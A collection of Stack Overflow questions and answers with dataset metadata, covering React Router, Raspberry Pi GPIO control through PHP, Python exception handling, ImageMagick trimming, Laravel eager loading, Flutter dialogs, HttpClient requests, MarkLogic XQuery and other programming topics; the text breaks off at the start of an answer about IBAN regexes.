You can then use this.props.history.push("/some_location") in the context of the component
2) If your component is not related to a specific route, you can get the same props by using the withRouter high order component, which is part of react-router
import { withRouter } from "react-router-dom";
const Component = ( { history, location, match } ) => (
// your component code
);
export default withRouter(Component);
| stackoverflow | {
"language": "en",
"length": 450,
"provenance": "stackexchange_0000F.jsonl.gz:901183",
"question_score": "5",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44655661"
} |
ca6f0b0bb31d371a5f9e928411f640def8ba5c0a | Stackoverflow Stackexchange
Q: Python - Control Led using php I would like to control my led lighting through webpage. I follow a YouTube tutorial, it works perfectly for pinon.php and pinoff.php.
However, it does not work for control.php, anybody knows the reason?
pinon.php
<?php
system("gpio -g mode 18 out");
system("gpio -g write 18 1");
?>
pinoff.php
<?php
system("gpio -g mode 18 out");
system("gpio -g write 18 0");
?>
control.php
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<script src="http://code.jquery.com/jquery-1.11.0.min.js"></script>
<script type="text/javascript">
$(document).ready(function(){
$('#clickON').click(function(){
var a = new XMLHttpRequest();
a.open("GET","pinon.php");
a.onreadystatechange=function(){
if(a.readyState==4){
if(a.status == 200){
}
else alert("HTTP ERROR");
}
}
a.send();
});
$('#clickOFF').click(function(){
var a = new XMLHttpRequest();
a.open("GET","pinoff.php");
a.onreadystatechange=function(){
if(a.readyState==4){
if(a.status == 200){
}
else alert("HTTP ERROR");
}
}
a.send();
});
});
</script>
<title>Pi controller</title>
</head>
<body>
<button type="button" id="clickON">ON</button><br>
<button type="button" id="clickOFF">OFF</button><br>
</body>
</html>
Link for the tutorial :Making Raspberry Pi Web Controls
| Q: Python - Control Led using php I would like to control my led lighting through webpage. I follow a YouTube tutorial, it works perfectly for pinon.php and pinoff.php.
However, it does not work for control.php, anybody knows the reason?
pinon.php
<?php
system("gpio -g mode 18 out");
system("gpio -g write 18 1");
?>
pinoff.php
<?php
system("gpio -g mode 18 out");
system("gpio -g write 18 0");
?>
control.php
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<script src="http://code.jquery.com/jquery-1.11.0.min.js"></script>
<script type="text/javascript">
$(document).ready(function(){
$('#clickON').click(function(){
var a = new XMLHttpRequest();
a.open("GET","pinon.php");
a.onreadystatechange=function(){
if(a.readyState==4){
if(a.status == 200){
}
else alert("HTTP ERROR");
}
}
a.send();
});
$('#clickOFF').click(function(){
var a = new XMLHttpRequest();
a.open("GET","pinoff.php");
a.onreadystatechange=function(){
if(a.readyState==4){
if(a.status == 200){
}
else alert("HTTP ERROR");
}
}
a.send();
});
});
</script>
<title>Pi controller</title>
</head>
<body>
<button type="button" id="clickON">ON</button><br>
<button type="button" id="clickOFF">OFF</button><br>
</body>
</html>
Link for the tutorial :Making Raspberry Pi Web Controls
| stackoverflow | {
"language": "en",
"length": 141,
"provenance": "stackexchange_0000F.jsonl.gz:901210",
"question_score": "3",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44655734"
} |
c47935ddc737ffcb3760eab178690b9ede7a5c10 | Stackoverflow Stackexchange
Q: twitter stream api filter_level I can't find any reference about the twitter stream api filter_level when I want to follow some accounts using user stream.
I know none means no filter, but I keep get retweets from other people when I set filter_level as low, when I set the filter_level to medium, I can't get anything from it. Anybody could tell me what filters does each filter_level mean.
A: Twitter measures the importance of a tweet using this parameter.It is a rating that Twitter gives to its tweets. A tweet with filter_level=high is identified as more important ( a part of @toptweets concept ).
If you set filter_level=low, then you are asking for tweets with low, medium and high filter levels.You set the minimum quality of the tweets that you want using filter_level.
This is a useful resource: https://thenextweb.com/twitter/2013/02/14/twitter-adds-language-info-ability-to-filter-tweets-by-importance-with-new-metadata/
| Q: twitter stream api filter_level I can't find any reference about the twitter stream api filter_level when I want to follow some accounts using user stream.
I know none means no filter, but I keep get retweets from other people when I set filter_level as low, when I set the filter_level to medium, I can't get anything from it. Anybody could tell me what filters does each filter_level mean.
A: Twitter measures the importance of a tweet using this parameter.It is a rating that Twitter gives to its tweets. A tweet with filter_level=high is identified as more important ( a part of @toptweets concept ).
If you set filter_level=low, then you are asking for tweets with low, medium and high filter levels.You set the minimum quality of the tweets that you want using filter_level.
This is a useful resource: https://thenextweb.com/twitter/2013/02/14/twitter-adds-language-info-ability-to-filter-tweets-by-importance-with-new-metadata/
| stackoverflow | {
"language": "en",
"length": 140,
"provenance": "stackexchange_0000F.jsonl.gz:901236",
"question_score": "4",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44655818"
} |
b69c5d2477bd9700ef41c2794a5a50e097791150 | Stackoverflow Stackexchange
Q: What is the difference between except and except BaseException What is the difference between those two:
except:
# do something
and
except BaseException as be:
print(be)
I mean in the first case all possible exception are caught, but is this true for the second?
Also can the error message be printed using the first case?
A: The accepted answer is incorrect incomplete (at least for Python 3.6 and above).
By catching Exception you catch most errors - basically all the errors that any module you use might throw.
By catching BaseException, in addition to all the above exceptions, you also catch exceptions of the types SystemExit, KeyboardInterrupt, and GeneratorExit.
By catching KeyboardInterrupt, for example, you may stop your code from exiting after an initiated exit by the user (like pressing ^C in the console, or stopping launched application on some interpreters). This could be a wanted behavior (for example - to log an exit), but should be used with extreme care!
In the above example, by catching BaseException, you may cause your application to hang when you want it to exit.
| Q: What is the difference between except and except BaseException What is the difference between those two:
except:
# do something
and
except BaseException as be:
print(be)
I mean in the first case all possible exception are caught, but is this true for the second?
Also can the error message be printed using the first case?
A: The accepted answer is incorrect incomplete (at least for Python 3.6 and above).
By catching Exception you catch most errors - basically all the errors that any module you use might throw.
By catching BaseException, in addition to all the above exceptions, you also catch exceptions of the types SystemExit, KeyboardInterrupt, and GeneratorExit.
By catching KeyboardInterrupt, for example, you may stop your code from exiting after an initiated exit by the user (like pressing ^C in the console, or stopping launched application on some interpreters). This could be a wanted behavior (for example - to log an exit), but should be used with extreme care!
In the above example, by catching BaseException, you may cause your application to hang when you want it to exit.
A: Practically speaking, there is no difference between except: and except BaseException:, for any current Python release.
That's because you can't just raise any type of object as an exception. The raise statement explicitly disallows raising anything else:
[...] raise evaluates the first expression as the exception object. It must be either a subclass or an instance of BaseException.
Bold emphasis mine. This has not always been the case however, in older Python releases (2.4 and before) you could use strings as exceptions too.
The advantage then is that you get to have easy access to the caught exception. In order to be able to add as targetname, you must catch a specific class of exceptions, and only BaseException is going to do that.
You can still access the currently active exception by using sys.exc_info() though:
except:
be = sys.exc_info()[1]
Pick what you feel is more readable for your future self and for your colleagues.
| stackoverflow | {
"language": "en",
"length": 337,
"provenance": "stackexchange_0000F.jsonl.gz:901249",
"question_score": "29",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44655854"
} |
cefde8b66859f0077126027d35dfef326a46debc | Stackoverflow Stackexchange
Q: Autotrim white border from scanned image with ImageMagick? I have ~200 scanned photos which I want to crop the white space out of. See example:
Can someone provide me with the appropriate command line code to do this?... I have been trying to sort out the -trim and -fuzz options with no luck. NOT ALL images are same size (i.e. 4x6, 5x7, etc). All images were scanned/saved as jpg
Ideal scenario is a script where new trimmed photos are saved in one subdirectory.
Thanks in advance!
A: I would suggest using -morphology to remove the scan artifacts, trim, and then capture the resulting paging.
PAGE_OFFSET=$(convert TrmkF.jpg -morphology Dilate:3 Diamond:3,5 -fuzz 10% -trim -format '%wx%h%O' info:-)
The $PAGE_OFFSET variable should now have the rough location of the scanned photo. We can apply that value with the -crop command.
convert TrmkF.jpg -crop $PAGE_OFFSET output.jpg
[![output][1]][1]
Edit
A (powershell) batch script may look as simple as...
Get-ChildItem "C:\path\to\photos" -Filter *.jpg |
Foreach-Object {
$pageOffset = magick $_.FullName -morphology Dilate:3 Diamond:3,5 -fuzz 10% -trim -format '%xx%h%O' info:- | Out-String
$output = $_.FullName + ".output.jpg"
magick $_.FullName -crop $pageOffset +repage $output
}
ymmv
[1]: https://i.stack.imgur.com/u8bSs.png
| Q: Autotrim white border from scanned image with ImageMagick? I have ~200 scanned photos which I want to crop the white space out of. See example:
Can someone provide me with the appropriate command line code to do this?... I have been trying to sort out the -trim and -fuzz options with no luck. NOT ALL images are same size (i.e. 4x6, 5x7, etc). All images were scanned/saved as jpg
Ideal scenario is a script where new trimmed photos are saved in one subdirectory.
Thanks in advance!
A: I would suggest using -morphology to remove the scan artifacts, trim, and then capture the resulting paging.
PAGE_OFFSET=$(convert TrmkF.jpg -morphology Dilate:3 Diamond:3,5 -fuzz 10% -trim -format '%wx%h%O' info:-)
The $PAGE_OFFSET variable should now have the rough location of the scanned photo. We can apply that value with the -crop command.
convert TrmkF.jpg -crop $PAGE_OFFSET output.jpg
[![output][1]][1]
Edit
A (powershell) batch script may look as simple as...
Get-ChildItem "C:\path\to\photos" -Filter *.jpg |
Foreach-Object {
$pageOffset = magick $_.FullName -morphology Dilate:3 Diamond:3,5 -fuzz 10% -trim -format '%xx%h%O' info:- | Out-String
$output = $_.FullName + ".output.jpg"
magick $_.FullName -crop $pageOffset +repage $output
}
ymmv
[1]: https://i.stack.imgur.com/u8bSs.png
A: I've found that the above gives bad results, I think the formatting is different on MacOS or something so sharing the success story here. I have exactly this same issue - hundreds of scanned photos with some blotches in the white ruining the auto trim function.
I just modified parameters from the other individual's answer and got amazing results using this:
*
*cd into your folder of images
*mkdir ../done
*v
echo "$f";\
size=$(magick "$f" -bordercolor White -border 10x10 \
-morphology Dilate:5 Diamond:5,7 -fuzz 5% -trim \
-format "%wx%h%O" info:-); \
echo $size; \
magick "$f" -bordercolor White -border 10x10 -crop $size +repage "../done/$f"; done;
| stackoverflow | {
"language": "en",
"length": 297,
"provenance": "stackexchange_0000F.jsonl.gz:901284",
"question_score": "3",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44655961"
} |
e91e5fc4b9c4713cc5f3eb6f72a8333a808f7223 | Stackoverflow Stackexchange
Q: Laravel return model relationships in JSON When I try to return model relationships in JSON, I don't see the relationship fields. That's my query:
$customer_subscriptions = CustomerSubscription::has("customer")
->has("subscription")
->has("federationDiscipline")
->where("customer_id", "=", $customer_id)
->whereHas("subscription", function($query) use($company_id) {
$query->where("company_id", "=", $company_id);
})
->orderBy("start_date", "asc");
return $customer_subscriptions;
That's my result:
[0]=>
array(14) {
["id"]=>
int(2)
["customer_id"]=>
int(1)
["subscription_id"]=>
int(1)
["federation_discipline_id"]=>
int(1)
["start_date"]=>
string(10) "2017-04-01"
["end_date"]=>
string(10) "2017-05-31"
["external_id"]=>
NULL
["notes"]=>
NULL
["created_user_id"]=>
int(1)
["updated_user_id"]=>
NULL
["deleted_user_id"]=>
NULL
["created_at"]=>
string(19) "2017-06-05 07:28:00"
["updated_at"]=>
string(19) "2017-06-05 07:28:00"
["deleted_at"]=>
NULL
}
I don't see the subscription's and the customer's relationship field. The result of query should return JSON to AJAX
A: Using ->has only acts as a where condition, it doesn't load that relation in to your result set.
You want to use ->with instead.
In your case ->with('subscription','federationDiscipline')
https://laravel.com/docs/5.4/eloquent-relationships#eager-loading
| Q: Laravel return model relationships in JSON When I try to return model relationships in JSON, I don't see the relationship fields. That's my query:
$customer_subscriptions = CustomerSubscription::has("customer")
->has("subscription")
->has("federationDiscipline")
->where("customer_id", "=", $customer_id)
->whereHas("subscription", function($query) use($company_id) {
$query->where("company_id", "=", $company_id);
})
->orderBy("start_date", "asc");
return $customer_subscriptions;
That's my result:
[0]=>
array(14) {
["id"]=>
int(2)
["customer_id"]=>
int(1)
["subscription_id"]=>
int(1)
["federation_discipline_id"]=>
int(1)
["start_date"]=>
string(10) "2017-04-01"
["end_date"]=>
string(10) "2017-05-31"
["external_id"]=>
NULL
["notes"]=>
NULL
["created_user_id"]=>
int(1)
["updated_user_id"]=>
NULL
["deleted_user_id"]=>
NULL
["created_at"]=>
string(19) "2017-06-05 07:28:00"
["updated_at"]=>
string(19) "2017-06-05 07:28:00"
["deleted_at"]=>
NULL
}
I don't see the subscription's and the customer's relationship field. The result of query should return JSON to AJAX
A: Using ->has only acts as a where condition, it doesn't load that relation in to your result set.
You want to use ->with instead.
In your case ->with('subscription','federationDiscipline')
https://laravel.com/docs/5.4/eloquent-relationships#eager-loading
A: You have to eager load the relationships for them to be included in the json output. You current query only looks if there are relations, it doesn't load them.
For example:
$customer_subscriptions = CustomerSubscription::has("customer")
->has("subscription")
->has("federationDiscipline")
->where("customer_id", "=", $customer_id)
->whereHas("subscription", function($query) use($company_id) {
$query->where("company_id", "=", $company_id);
})
->orderBy("start_date", "asc")
->with('customer'); // <--- Eager loading the customer
return $customer_subscriptions;
return $customer_subscriptions;
A: Use the with() method to include relationships in results. For example:
$customer_subscriptions = CustomerSubscription::with("customer")->...
Alternatively, use the protected $appends = [...] attribute on models to force the relationship to be loaded for every query. Keep in mind, however, this will impact queries everywhere the model is used, as it forces the database to query for those relationships every time.
| stackoverflow | {
"language": "en",
"length": 256,
"provenance": "stackexchange_0000F.jsonl.gz:901287",
"question_score": "3",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44655969"
} |
336f6432f49cee03f272c6e05caa1c3a1ce18474 | Stackoverflow Stackexchange
Q: How to write DataFrame-friendly functions Recently I've been making the switch from using numpy's ndarray to pandas' DataFrame for my data analysis needs. I've noticed that numpy functions seem to accept DataFrame objects in place of ndarray without issue. However, when I try to use many of my existing functions written to operate on ndarray, they often fail on indexing operations, broadcasting etc. and I am forced to pass the underlying ndarray with df.values.
Is there some standard way or set of guidelines to make a function compatible with DataFrame? How do numpy functions accomodate for both types?
A: I resorted to digging around in the numpy source code and found that many functions simply convert the input to ndarray first using functions such as asarray or asanyarray.
def numpyFunction(x, *args, **kwargs):
x = np.asanyarray(x)
...
| Q: How to write DataFrame-friendly functions Recently I've been making the switch from using numpy's ndarray to pandas' DataFrame for my data analysis needs. I've noticed that numpy functions seem to accept DataFrame objects in place of ndarray without issue. However, when I try to use many of my existing functions written to operate on ndarray, they often fail on indexing operations, broadcasting etc. and I am forced to pass the underlying ndarray with df.values.
Is there some standard way or set of guidelines to make a function compatible with DataFrame? How do numpy functions accomodate for both types?
A: I resorted to digging around in the numpy source code and found that many functions simply convert the input to ndarray first using functions such as asarray or asanyarray.
def numpyFunction(x, *args, **kwargs):
x = np.asanyarray(x)
...
| stackoverflow | {
"language": "en",
"length": 137,
"provenance": "stackexchange_0000F.jsonl.gz:901295",
"question_score": "4",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44656007"
} |
d81cab36498ec528330abae65caa8e437b6f6aab | Stackoverflow Stackexchange
Q: How do I generate .d.ts typings from Flow code? I have enabled Flow on a JavaScript project I am developing. Since I am putting in the effort to providing type annotations, I would really like to generate *.d.ts files so the broader TypeScript community can also have type information.
How can I generate *.d.ts type definition files from Flow-annotated JavaScript?
A: I searched for the available tools. I found the following.
The first one is the most up to date one. It can convert the whole Flow code to TypeScript. I have used it personally, and it works like a charm.
https://github.com/Khan/flow-to-ts
Other ones:
https://github.com/Kiikurage/babel-plugin-flow-to-typescript
https://github.com/burnnat/flow-to-dts
https://github.com/bcherny/flow-to-typescript
https://github.com/yuya-takeyama/flow2dts
| Q: How do I generate .d.ts typings from Flow code? I have enabled Flow on a JavaScript project I am developing. Since I am putting in the effort to providing type annotations, I would really like to generate *.d.ts files so the broader TypeScript community can also have type information.
How can I generate *.d.ts type definition files from Flow-annotated JavaScript?
A: I searched for the available tools. I found the following.
The first one is the most up to date one. It can convert the whole Flow code to TypeScript. I have used it personally, and it works like a charm.
https://github.com/Khan/flow-to-ts
Other ones:
https://github.com/Kiikurage/babel-plugin-flow-to-typescript
https://github.com/burnnat/flow-to-dts
https://github.com/bcherny/flow-to-typescript
https://github.com/yuya-takeyama/flow2dts
| stackoverflow | {
"language": "en",
"length": 109,
"provenance": "stackexchange_0000F.jsonl.gz:901297",
"question_score": "18",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44656011"
} |
0fd0597376fb520025f8398a13470eeeeb965173 | Stackoverflow Stackexchange
Q: Flutter - SimpleDialog in FloatingActionButton I'm trying to create a SimpleDialog after a tap on the FloatingActionButton, however when pressing that button nothing happens.
What was I doing wrong?
import "package:flutter/material.dart";
void main() {
runApp(new ControlleApp());
}
class ControlleApp extends StatelessWidget {
@override
Widget build(BuildContext context) {
return new MaterialApp(
home: new HomePage(),
);
}
}
class HomePage extends StatelessWidget {
@override
Widget build(BuildContext context) => new Scaffold(
appBar: new AppBar(
backgroundColor: new Color(0xFF26C6DA),
),
floatingActionButton: new FloatingActionButton(
tooltip: 'Add',
child: new Icon(Icons.add),
backgroundColor: new Color(0xFFF44336),
onPressed: (){
new SimpleDialog(
title: new Text('Test'),
children: <Widget>[
new RadioListTile(
title: new Text('Testing'), value: null, groupValue: null, onChanged: (value) {},
)
],
);
}
),
);
}
A: I noticed the accepted answer is using child for showDialog which is actually deprecated, so I would recommend avoiding it. You should be using builder instead, I've provided an example:
onPressed: () {
showDialog(
context: context,
builder: (_) => AlertDialog(
title: Text('Dialog Title'),
content: Text('This is my content'),
)
);
}
| Q: Flutter - SimpleDialog in FloatingActionButton I'm trying to create a SimpleDialog after a tap on the FloatingActionButton, however when pressing that button nothing happens.
What was I doing wrong?
import "package:flutter/material.dart";
void main() {
runApp(new ControlleApp());
}
class ControlleApp extends StatelessWidget {
@override
Widget build(BuildContext context) {
return new MaterialApp(
home: new HomePage(),
);
}
}
class HomePage extends StatelessWidget {
@override
Widget build(BuildContext context) => new Scaffold(
appBar: new AppBar(
backgroundColor: new Color(0xFF26C6DA),
),
floatingActionButton: new FloatingActionButton(
tooltip: 'Add',
child: new Icon(Icons.add),
backgroundColor: new Color(0xFFF44336),
onPressed: (){
new SimpleDialog(
title: new Text('Test'),
children: <Widget>[
new RadioListTile(
title: new Text('Testing'), value: null, groupValue: null, onChanged: (value) {},
)
],
);
}
),
);
}
A: I noticed the accepted answer is using child for showDialog which is actually deprecated, so I would recommend avoiding it. You should be using builder instead, I've provided an example:
onPressed: () {
showDialog(
context: context,
builder: (_) => AlertDialog(
title: Text('Dialog Title'),
content: Text('This is my content'),
)
);
}
A: You need to wrap this on a show action dialog.
showDialog(context: context, builder: (BuildContext context) {
return new AlertDialog(
title: new Text("My Super title"),
content: new Text("Hello World"),
);
}
A: There is a specific scenario which should be taken care while showing the dialog from floatingActionButton
if you write your code like this
class MyApp extends StatelessWidget {
@override
Widget build(BuildContext context) {
return MaterialApp(
home: Scaffold(
floatingActionButton: FloatingActionButton(
onPressed: () {
showDialog(
context: context,
builder: (ctxt) => new AlertDialog(
title: Text("Text Dialog"),
)
);
}),
)
);
}
}
It will not show Alert Dialog but throws an exception "No MaterialLocalizations found."
This happens when the MaterialApp is not the root where the dialog is called. In this case the root widget is the Application. However, if we change the code as
class MyApp extends StatelessWidget {
@override
Widget build(BuildContext context) {
return MaterialApp(
home: MyAppImpl()
);
}
}
class MyAppImpl extends StatelessWidget {
@override
Widget build(BuildContext context) {
return Scaffold(
floatingActionButton: FloatingActionButton(
onPressed: () {
showDialog(
context: context,
builder: (ctxt) => new AlertDialog(
title: Text("Text Dialog"),
)
);
}),
);
}
}
The MaterialApp becomes the root and everything works fine. In this case flutter automatically creates Material Localiation which otherwise needs to be manually created.
I didn't find any documentation for the same in the official doc.
Hope it helps
| stackoverflow | {
"language": "en",
"length": 392,
"provenance": "stackexchange_0000F.jsonl.gz:901298",
"question_score": "46",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44656013"
} |
d3877864c07fdf4f8db76a01ba6a1355741286c9 | Stackoverflow Stackexchange
Q: Unable to start debugging on the web server. The underlying connection was closed: An unexpected error occurred on a send We are developing a SOAP-based WCF Service in Visual Studio:
The virtual directory did get created. However, when I try to run the code in Visual Studio 2015 (F5) Debug mode, it give me the following error:
Unable to start debugging on the web server. The underlying
connection was closed: An unexpected error occurred on a send
The aforementioned error started showing up when our company changed their Windows Domain name. How I can resolve the problem?
Here are the technologies used in our development environment:
*
*Windows Server 2012 R2 Standard 64-bit Operating System, x64-based processor
*Microsoft Visual Studio Enterprise 2015 Version 14.0.25431.01 Update 3
*Internet Information Services ( Version 8.5.9600.16384 )
A: 1- Select your site in IIS.
2- Go to top-right and click on bindings.
3- Select your application and click edit.
4- Select a SSL certificate, if it doesn't exist then you may need to create
it.
| Q: Unable to start debugging on the web server. The underlying connection was closed: An unexpected error occurred on a send We are developing a SOAP-based WCF Service in Visual Studio:
The virtual directory did get created. However, when I try to run the code in Visual Studio 2015 (F5) Debug mode, it give me the following error:
Unable to start debugging on the web server. The underlying
connection was closed: An unexpected error occurred on a send
The aforementioned error started showing up when our company changed their Windows Domain name. How I can resolve the problem?
Here are the technologies used in our development environment:
*
*Windows Server 2012 R2 Standard 64-bit Operating System, x64-based processor
*Microsoft Visual Studio Enterprise 2015 Version 14.0.25431.01 Update 3
*Internet Information Services ( Version 8.5.9600.16384 )
A: 1- Select your site in IIS.
2- Go to top-right and click on bindings.
3- Select your application and click edit.
4- Select a SSL certificate, if it doesn't exist then you may need to create
it.
A: I needed to make a Fake Self-Signed Certificate, and associate it with the https 443 port of the Web site as the picture below shows:
A: For me it worked after windows update.
*
*Go to settings then update & Security.
*Click on check online for updates from Microsoft update -> It will start downloading the updates and will installing automatically.
*once installation and downloading completed it will ask for restart then go for restart the system and then try.
| stackoverflow | {
"language": "en",
"length": 253,
"provenance": "stackexchange_0000F.jsonl.gz:901305",
"question_score": "7",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44656027"
} |
ae504b41fb25f411b51bc0d0c06a467fc93ab904 | Stackoverflow Stackexchange
Q: Converting code from RestSharp to HttpClient Could someone please help me convert this ASP .Net Core example (to be used in my Web Api to consume a management API from Auth0) which uses RestSharp into one using HttpClient?
var client = new RestClient("https://YOUR_AUTH0_DOMAIN/oauth/token");
var request = new RestRequest(Method.POST);
request.AddHeader("content-type", "application/json");
request.AddParameter("application/json", "{\"grant_type\":\"client_credentials\",\"client_id\": \"YOUR_CLIENT_ID\",\"client_secret\": \"YOUR_CLIENT_SECRET\",\"audience\": \"https://YOUR_AUTH0_DOMAIN/api/v2/\"}", ParameterType.RequestBody);
IRestResponse response = client.Execute(request);
I've been struggling... I've got this:
var client = new HttpClient();
client.DefaultRequestHeaders.Accept.Clear();
client.DefaultRequestHeaders.Accept.Add(new MediaTypeWithQualityHeaderValue("application/json"));
client.BaseAddress = new Uri("https://YOUR_AUTH0_DOMAIN/oauth/token");
but I'm not sure about the rest... thank you
A: You need to take the request body and create content to post
var client = new HttpClient();
client.DefaultRequestHeaders.Accept.Clear();
client.DefaultRequestHeaders.Accept.Add(new MediaTypeWithQualityHeaderValue("application/json"));
client.BaseAddress = new Uri("https://YOUR_AUTH0_DOMAIN/oauth/token");
var json = "{\"grant_type\":\"client_credentials\",\"client_id\": \"YOUR_CLIENT_ID\",\"client_secret\": \"YOUR_CLIENT_SECRET\",\"audience\": \"https://YOUR_AUTH0_DOMAIN/api/v2/\"}"
var content = new StringContent(json, Encoding.UTF8, "application/json");
var response = await client.PostAsync("", content);
| Q: Converting code from RestSharp to HttpClient Could someone please help me convert this ASP .Net Core example (to be used in my Web Api to consume a management API from Auth0) which uses RestSharp into one using HttpClient?
var client = new RestClient("https://YOUR_AUTH0_DOMAIN/oauth/token");
var request = new RestRequest(Method.POST);
request.AddHeader("content-type", "application/json");
request.AddParameter("application/json", "{\"grant_type\":\"client_credentials\",\"client_id\": \"YOUR_CLIENT_ID\",\"client_secret\": \"YOUR_CLIENT_SECRET\",\"audience\": \"https://YOUR_AUTH0_DOMAIN/api/v2/\"}", ParameterType.RequestBody);
IRestResponse response = client.Execute(request);
I've been struggling... I've got this:
var client = new HttpClient();
client.DefaultRequestHeaders.Accept.Clear();
client.DefaultRequestHeaders.Accept.Add(new MediaTypeWithQualityHeaderValue("application/json"));
client.BaseAddress = new Uri("https://YOUR_AUTH0_DOMAIN/oauth/token");
but I'm not sure about the rest... thank you
A: You need to take the request body and create content to post
var client = new HttpClient();
client.DefaultRequestHeaders.Accept.Clear();
client.DefaultRequestHeaders.Accept.Add(new MediaTypeWithQualityHeaderValue("application/json"));
client.BaseAddress = new Uri("https://YOUR_AUTH0_DOMAIN/oauth/token");
var json = "{\"grant_type\":\"client_credentials\",\"client_id\": \"YOUR_CLIENT_ID\",\"client_secret\": \"YOUR_CLIENT_SECRET\",\"audience\": \"https://YOUR_AUTH0_DOMAIN/api/v2/\"}"
var content = new StringContent(json, Encoding.UTF8, "application/json");
var response = await client.PostAsync("", content);
| stackoverflow | {
"language": "en",
"length": 133,
"provenance": "stackexchange_0000F.jsonl.gz:901339",
"question_score": "8",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44656130"
} |
923af94cbd75ee801f9215ed4d8a49734e20aa61 | Stackoverflow Stackexchange
Q: Marklogic: Xpath using removing processing instruction tag How to remove the processing instruction tag in xml using XQuery ?
Sample XML:
<a>
<text><?test id="1" loc="start"?><b type="bold">1. </b>
Security or protection <?test id="1" loc=="end"?><?test id="1" loc="start"?><b type="bold">2.
</b> Analyse.
<?test id="1" loc="end"?></text>
</a>
Expected output :
<a>
<text><b type="bold">1. </b> Security or protection <b type="bold">2.
</b> Analyse.</text>
</a>
Kindly help to removing PI tags.
A: Something like this should work:
xquery version "1.0-ml";
declare function local:suppress-pi($nodes) {
for $node in $nodes
return
typeswitch ($node)
case element() return
element { fn:node-name($node) } {
$node/@*,
local:suppress-pi($node/node())
}
case processing-instruction() return ()
default return $node
};
local:suppress-pi(<a>
<text><?test id="1" loc="start"?><b type="bold">1. </b>
Security or protection <?test id="1" loc=="end"?><?test id="1" loc="start"?><b type="bold">2.
</b> Analyse.
<?test id="1" loc="end"?></text>
</a>)
HTH!
| Q: Marklogic: Xpath using removing processing instruction tag How to remove the processing instruction tag in xml using XQuery ?
Sample XML:
<a>
<text><?test id="1" loc="start"?><b type="bold">1. </b>
Security or protection <?test id="1" loc=="end"?><?test id="1" loc="start"?><b type="bold">2.
</b> Analyse.
<?test id="1" loc="end"?></text>
</a>
Expected output :
<a>
<text><b type="bold">1. </b> Security or protection <b type="bold">2.
</b> Analyse.</text>
</a>
Kindly help to removing PI tags.
A: Something like this should work:
xquery version "1.0-ml";
declare function local:suppress-pi($nodes) {
for $node in $nodes
return
typeswitch ($node)
case element() return
element { fn:node-name($node) } {
$node/@*,
local:suppress-pi($node/node())
}
case processing-instruction() return ()
default return $node
};
local:suppress-pi(<a>
<text><?test id="1" loc="start"?><b type="bold">1. </b>
Security or protection <?test id="1" loc=="end"?><?test id="1" loc="start"?><b type="bold">2.
</b> Analyse.
<?test id="1" loc="end"?></text>
</a>)
HTH!
| stackoverflow | {
"language": "en",
"length": 125,
"provenance": "stackexchange_0000F.jsonl.gz:901341",
"question_score": "3",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44656139"
} |
18e4556866b6014d03eebcd0fd4ebd79d4ab60ab | Stackoverflow Stackexchange
Q: How to do annotations with Altair? I am trying to write some text inside the figure to highlight something in my plot (equivalent to 'annotate' in matplotlib). Any idea? Thanks
A: You can get annotations into your Altair plots in two steps:
*
*Use mark_text() to specify the annotation's position, fontsize etc.
*Use transform_filter() from datum to select the points (data subset) that needs the annotation. Note the line from altair import datum.
Code:
import altair as alt
from vega_datasets import data
alt.renderers.enable('notebook')
from altair import datum #Needed for subsetting (transforming data)
iris = data.iris()
points = alt.Chart(iris).mark_point().encode(
x='petalLength',
y='petalWidth',
color='species')
annotation = alt.Chart(iris).mark_text(
align='left',
baseline='middle',
fontSize = 20,
dx = 7
).encode(
x='petalLength',
y='petalWidth',
text='petalLength'
).transform_filter(
(datum.petalLength >= 5.1) & (datum.petalWidth < 1.6)
)
points + annotation
which produces:
These are static annotations. You can also get interactive annotations by binding selections to the plots.
| Q: How to do annotations with Altair? I am trying to write some text inside the figure to highlight something in my plot (equivalent to 'annotate' in matplotlib). Any idea? Thanks
A: You can get annotations into your Altair plots in two steps:
*
*Use mark_text() to specify the annotation's position, fontsize etc.
*Use transform_filter() from datum to select the points (data subset) that needs the annotation. Note the line from altair import datum.
Code:
import altair as alt
from vega_datasets import data
alt.renderers.enable('notebook')
from altair import datum #Needed for subsetting (transforming data)
iris = data.iris()
points = alt.Chart(iris).mark_point().encode(
x='petalLength',
y='petalWidth',
color='species')
annotation = alt.Chart(iris).mark_text(
align='left',
baseline='middle',
fontSize = 20,
dx = 7
).encode(
x='petalLength',
y='petalWidth',
text='petalLength'
).transform_filter(
(datum.petalLength >= 5.1) & (datum.petalWidth < 1.6)
)
points + annotation
which produces:
These are static annotations. You can also get interactive annotations by binding selections to the plots.
| stackoverflow | {
"language": "en",
"length": 147,
"provenance": "stackexchange_0000F.jsonl.gz:901342",
"question_score": "8",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44656141"
} |
914b6e9abbc016ac0243b605dce8f23ecf7c4d8f | Stackoverflow Stackexchange
Q: IBAN Regex design Help me please to design Regex that will match all IBANs with all possible whitespaces. Because I've found that one, but it does not work with whitespaces.
[a-zA-Z]{2}[0-9]{2}[a-zA-Z0-9]{4}[0-9]{7}([a-zA-Z0-9]?){0,16}
I need at least that formats:
DE89 3704 0044 0532 0130 00
AT61 1904 3002 3457 3201
FR14 2004 1010 0505 0001 3
A: Here is a suggestion that may works for the patterns you provided:
